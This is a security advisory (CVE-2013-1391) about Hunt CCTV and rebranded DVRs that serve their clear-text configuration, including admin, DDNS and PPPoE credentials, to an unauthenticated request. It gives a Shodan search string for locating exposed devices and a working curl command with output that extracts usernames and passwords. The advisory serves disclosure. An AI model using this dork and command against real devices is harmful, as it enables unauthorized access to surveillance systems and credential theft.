Hunt CCTV Credential Disclosure

2013-01-28T00:00:00
ID PACKETSTORM:119871
Type packetstorm
Reporter Alejandro Ramos
Modified 2013-01-28T00:00:00

Description

                                        
                                            `Hunt CCTV (and generics brands) Insufficient Authentication  
January 17, 2013 - A. Ramos <aramosf @ gmail . com>  
  
-- CVE ID:  
CVE-2013-1391 [reserved]  
  
-- Affected Vendors:  
Hunt CCTV (http://www.huntcctv.com/)  
** generic brands from Hunt **  
Capture CCTV (http://www.capturecctv.ca/)  
NoVus CCTV (http://www.novuscctv.com/)  
Well-Vision Inc (http://well-vision.com/)  
  
-- Affected Models:  
DVR-04 / DVR-04CH (HuntCCTV)  
DVR-04NC (HuntCCTV)  
DVR-08 / DVR-08CH (HuntCCTV)  
DVR-08NC (HuntCCTV)  
DVR-16 / DVR-16CH (HuntCCTV)  
CDR 0410VE (CaptureCCTV-HuntCCTV)  
CDR 0820VDE (CaptureCCTV-HuntCCTV)  
DR6-704A4H (HuntCCTV)  
DR6-708A4H (HuntCCTV)  
DR6-7316A4H (HuntCCTV)  
DR6-7316A4HL (HuntCCTV)  
HDR-04KD (unknown-HuntCCTV)  
HDR-08KD (unknown-HuntCCTV)  
HV-04RD PRO (Hachi-HuntCCTV)  
HV-08RD PRO (Hachi-HuntCCTV)  
NV-DVR1204 (NovusSec)  
NV-DVR1208 (NovusSec)  
NV-DVR1216 (NovusSec)  
TW-DVR604 (Well Vision INC Solutions-HuntCCTV)  
TW-DVR616 (Well Vision INC Solutions-HuntCCTV)  
  
Shodan dork: Basic realm="DVR" server: httpd -mini  
Shodan results: 46890  
Vulnerable: >70%  
  
-- Vulnerability Details:  
You can get the entire backup config with simple GET. No authentication  
required.  
All information are in clear text: admin panel, ddns config, ppoe  
credentials, misc.  
  
Example:  
  
[aramosf@velouria data]$ curl -v http://x.x.x.x/DVR.cfg | strings |grep -i  
USER  
* Trying x.x.x.x... connected  
* Connected to x.x.x.x (x.x.x.x) port 80 (#0)  
> GET /DVR.cfg HTTP/1.1  
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/  
3.13.1.0 zlib/1.2.3 libidn/1.18 libssh2/1.2.2  
> Host: x.x.x.x  
> Accept: */*  
>  
< HTTP/1.0 200 Ok  
< Server: httpd  
< Date: Fri, 17 Jan 2013 05:47:02 GMT  
< Cache-Control: no-cache  
< Pragma: no-cache  
< Expires: 0  
< Connection: close  
< Content-Type: application/octet-stream  
<  
USER1_USERNAME=iam  
USER1_PASSWORD=sexy  
  
Vulnerable firmware (127 different ones):  
- 1.1.10 to 1.1.92  
- 1.47 to 1.51  
- 2.0.0 to 2.1.93  
- 3.0.04 to 3.1.92  
  
-- Disclosure Timeline:  
2011-09-?? - Vulnerability discovered  
2012-12-20 - Published in the book "Hacker Epico" (  
http://www.hackerepico.com)  
2013-01-15 - CVE Assigned  
2013-01-20 - Vulnerability reported to vendor  
2013-01-24 - Vulnerability reported to GDT (Spain)  
2013-01-28 - Public disclosure:  
http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html  
  
--   
Alejandro Ramos  
www.securitybydefault.com  
`